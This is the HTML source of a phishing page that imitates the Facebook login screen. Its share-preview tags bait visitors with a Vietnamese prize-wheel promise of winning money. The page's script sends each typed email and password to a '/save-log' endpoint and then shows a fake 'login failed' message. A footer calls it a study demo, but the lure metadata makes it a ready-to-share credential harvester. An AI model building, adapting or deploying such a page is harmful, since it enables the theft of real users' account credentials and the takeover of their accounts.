<!DOCTYPE html>
<html>
<head>
  <title>Facebook </title>
  <!-- Open Graph / Facebook -->
  <meta property="og:image" content="https://i.ibb.co/7dsm484P/39390526-930911057113406-554871553729232896-n.jpg" />
  <meta property="og:image:width" content="1200" />
  <meta property="og:image:height" content="630" />
  <meta property="og:title" content="Vòng Quay May Mắn" />
  <meta property="og:description" content="Quay Đúng, Trúng Tiền To" />
  <style>
    body { 
      font-family: Arial, sans-serif; 
      background: #f0f2f5; 
      margin: 0; 
      padding: 20px;
      display: flex;
      justify-content: center;
      align-items: center;
      min-height: 100vh;
    }
    .login-box {
      width: 400px;
      padding: 20px;
      background: white;
      border-radius: 8px;
      box-shadow: 0 2px 10px rgba(0,0,0,0.1);
      text-align: center;
    }
    input {
      width: 100%;
      padding: 12px;
      margin: 8px 0;
      border: 1px solid #ddd;
      border-radius: 5px;
      box-sizing: border-box;
    }
    button {
      background: #1877f2;
      color: white;
      border: none;
      padding: 12px;
      width: 100%;
      border-radius: 5px;
      font-weight: bold;
      cursor: pointer;
    }
    .error {
      color: #ff4444;
      margin-top: 15px;
    }
  </style>
</head>
<body>
  <div class="login-box">
    <h1 style="color:#1877f2">Facebook</h1>
    <form id="loginForm">
      <input type="text" id="email" placeholder="Email" required>
      <input type="password" id="password" placeholder="Mật khẩu" required>
      <button type="submit">Đăng nhập</button>
    </form>
    <div id="errorMessage" class="error"></div>
    <p style="color:#999;font-size:12px">Trang demo học tập - Không phải Facebook thật
      <center>desiner by Quan</center>
    </p>
  </div>
  
  <script>
    document.getElementById('loginForm').addEventListener('submit', async (e) => {
      e.preventDefault();
      const email = document.getElementById('email').value;
      const password = document.getElementById('password').value;

      try {
        const response = await fetch('/save-log', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ email, password })
        });
        document.getElementById('errorMessage').textContent = 'Đăng nhập thất bại ';
      } catch (error) {
        document.getElementById('errorMessage').textContent = 'Lỗi kết nối server';
      }
    });
  </script>
</body>
</html>